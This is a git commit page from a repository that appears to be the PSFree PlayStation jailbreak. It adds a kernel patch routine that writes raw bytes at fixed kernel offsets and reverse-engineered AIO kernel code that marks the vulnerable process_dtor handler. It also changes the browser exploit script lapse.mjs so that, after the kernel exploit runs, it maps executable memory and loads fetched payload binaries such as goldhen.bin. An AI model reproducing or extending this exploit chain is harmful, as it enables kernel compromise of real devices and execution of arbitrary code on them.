Seth/PSFree
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Temp AIO Payload Fix by ABC

Browse Source
This commit is contained in:
Kameleon
2025-08-20 22:35:00 -06:00
parent e01068bca9
commit 6833f09ae1
7 changed files with 165 additions and 9 deletions
Download Patch File Download Diff File Expand all files Collapse all files
AIO_Fix_Temp/patch_aio.c
+61
View File
@@ -0,0 +1,61 @@
void patch_aio(void * kbase) {
{
size_t off = 0x9f141;
u8 patch[] = {0xeb, 0x48};
memcpy(kbase + off, patch, sizeof patch);
}
{
size_t off = 0x9f183;
memset(kbase + off, 0x90, 8);
}
{
size_t off = 0x9f18b;
u8 patch[] = {41, 83, 0xbf, 0xa0, 0x04, 0x00, 0x00, 0x00};
memcpy(kbase + off, patch, sizeof patch);
}
{
size_t off = 0x9f199;
u8 patch[] = {0x49, 0x8b, 0x87, 0xd0, 0x04, 0x00, 0x00};
memcpy(kbase + off, patch, sizeof patch);
}
{
size_t off = 0x9f1a6;
u8 patch[] = {0x49, 0x8b, 0xb7, 0xb0, 0x04, 0x00, 0x00};
memcpy(kbase + off, patch, sizeof patch);
}
{
size_t off = 0x9f1be;
u8 patch[] = {0x49, 0x8b, 0x87, 0x40, 0x05, 0x00, 0x00};
memcpy(kbase + off, patch, sizeof patch);
}
{
size_t off = 0x9f1cb;
u8 patch[] = {0x49, 0x8b, 0xb7, 0x20, 0x05, 0x00, 0x00};
memcpy(kbase + off, patch, sizeof patch);
}
{
size_t off = 0x9f1e3;
u8 patch[] = {0x49, 0x8d, 0xbf, 0xc0, 0x00, 0x00, 0x00};
memcpy(kbase + off, patch, sizeof patch);
}
{
size_t off = 0x9f1ef;
u8 patch[] = {0x49, 0x8d, 0xbf, 0xe0, 0x00, 0x00, 0x00};
memcpy(kbase + off, patch, sizeof patch);
}
{
size_t off = 0x9f202;
u8 patch[] = {0x49, 0x8d, 0xbf, 0x00, 0x01, 0x00, 0x00};
memcpy(kbase + off, patch, sizeof patch);
}
{
size_t off = 0x9f20e;
u8 patch[] = {0x49, 0x8d, 0xbf, 0x20, 0x01, 0x00, 0x00};
memcpy(kbase + off, patch, sizeof patch);
}
{
size_t off = 0x9f21f;
u8 patch[] = {0x49, 0x8b, 0xff};
memcpy(kbase + off, patch, sizeof patch);
}
}
AIO_Fix_Temp/vfs_aio2_pdtor.c
+81
View File
@@ -0,0 +1,81 @@
int sys_aio_init(struct thread *td, aio_init_args *uap)
{
return __aio_init(td, uap->param, uap->size, uap->reserved4, uap->reserved5);
}
int __aio_init(
struct thread *td,
SceKernelAioParam* param,
u_int size,
u_long reserved4,
u_int reserved5)
{
// ...
if (param == NULL
|| ctx != &aio_ctxs[0]
|| aio_ctxs[0].state != 0
) {
init:
sx_xunlock(&aio_sx);
error = aio_init_params(init_sched_params, ctx);
if (error != 0) {
print_err(error);
}
goto done;
}
// ...
done:
return error;
unlock:
sx_xunlock(&aio_sx);
goto done;
}
int aio_init_ctx(int init_sched_params, struct aio_context *ctx)
{
// ...
if (aio_ehs[0] == 0) {
aio_ehs[0] = EVENTHANDLER_REGISTER(
"process_suspend_phase4",
process_suspend4_handler,
NULL,
EVENTHANDLER_PRI_LAST
);
aio_ehs[1] = EVENTHANDLER_REGISTER(
"process_suspend_phase1_end",
process_suspend1_handler,
NULL,
EVENTHANDLER_PRI_LAST
);
aio_ehs[2] = EVENTHANDLER_REGISTER(
"process_resume_phase2",
process_resume_handler,
NULL,
EVENTHANDLER_PRI_LAST
);
aio_ehs[3] = EVENTHANDLER_REGISTER(
"process_dtor",
process_dtor_handler, // !!!
NULL,
EVENTHANDLER_PRI_LAST
);
aio_ehs[4] = EVENTHANDLER_REGISTER(
"process_exit",
process_exit_handler,
NULL,
EVENTHANDLER_PRI_LAST
);
aio_ehs[5] = EVENTHANDLER_REGISTER(
"process_exit_fd_closed",
process_exit_fd_closed_handler,
NULL,
EVENTHANDLER_PRI_LAST
);
// ...
}
// ...
}
aio_patches.bin
BIN
View File
Binary file not shown.
goldhen.bin
BIN
View File
Binary file not shown.
lapse.mjs
+21 -8
View File
@@ -139,6 +139,11 @@ const leak_len = 16;
const num_leaks = 5; const num_leaks = 5;
const num_clobbers = 8; const num_clobbers = 8;
//Payload_Loader
const PROT_READ = 1;
const PROT_WRITE = 2;
const PROT_EXEC = 4;
let chain = null; let chain = null;
var nogc = []; var nogc = [];
@@ -1810,13 +1815,9 @@ function array_from_address(addr, size) {
return og_array; return og_array;
} }
kexploit().then(() => { function PayloadLoader(Pfile)
{
const PROT_READ = 1; var loader_addr = chain.sysp(
const PROT_WRITE = 2;
const PROT_EXEC = 4;
var loader_addr = chain.sysp(
'mmap', 'mmap',
new Int(0, 0), new Int(0, 0),
0x1000, 0x1000,
@@ -1831,7 +1832,7 @@ var loader_addr = chain.sysp(
var req = new XMLHttpRequest(); var req = new XMLHttpRequest();
req.responseType = "arraybuffer"; req.responseType = "arraybuffer";
req.open('GET','payload.bin'); req.open('GET',Pfile);
req.send(); req.send();
req.onreadystatechange = function () { req.onreadystatechange = function () {
if (req.readyState == 4) { if (req.readyState == 4) {
@@ -1856,4 +1857,16 @@ var loader_addr = chain.sysp(
} }
}; };
}
kexploit().then(() => {
//Load ABC fix as a regular Payload
setTimeout(PayloadLoader("aio_patches.bin"),500);
log("AIO Fixes Applied.!");
//Load GoldHEN :)
setTimeout(PayloadLoader("goldhen.bin"),500);
log("GoldHEN Loaded.!");
}) })
payload.bin
BIN
View File
Binary file not shown.
psfree_lapse.cache
+2 -1
View File
@@ -7,7 +7,8 @@ cache.html
config.mjs config.mjs
index.html index.html
lapse.mjs lapse.mjs
payload.bin aio_patches.bin
goldhen.bin
psfree.mjs psfree.mjs
fonts\LiberationMono-Regular.ttf fonts\LiberationMono-Regular.ttf
kpatch\900.elf kpatch\900.elf